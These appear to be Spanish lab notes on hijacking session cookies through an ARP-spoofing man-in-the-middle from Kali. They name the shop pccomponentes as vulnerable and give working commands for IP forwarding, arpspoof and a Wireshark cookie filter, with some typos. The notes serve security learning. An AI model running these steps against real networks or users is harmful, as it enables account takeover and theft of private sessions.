Las paginas seguras deben contener (Secure Flag y HTTP only)
Ejemplos:
dx.com -> no es vulnerable
pccomponentes -> vulnerable
Objetivo. Cuando nuestra victima se loguea un pccomponentes podemos obtener la cookie de sesión y con ella entrar en la cuenta de pccomponentes con los datos de la victima. El usuario debe estar navegando en pccomponentes, sino se sale de la sesión y se pierde la cookie.
Victama: XP navegando por pccomponentes (actualizar de vez en cuando para no perder la sesión)
Desde KALI:
Activamos el man-in-the-middle:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.0.2.4 10.0.2.1 -r
Luego abrimos wireshark para capturar los paquetes
wireshark
Comenzamos la captura de paquetes y filtramos por:
http constains cookie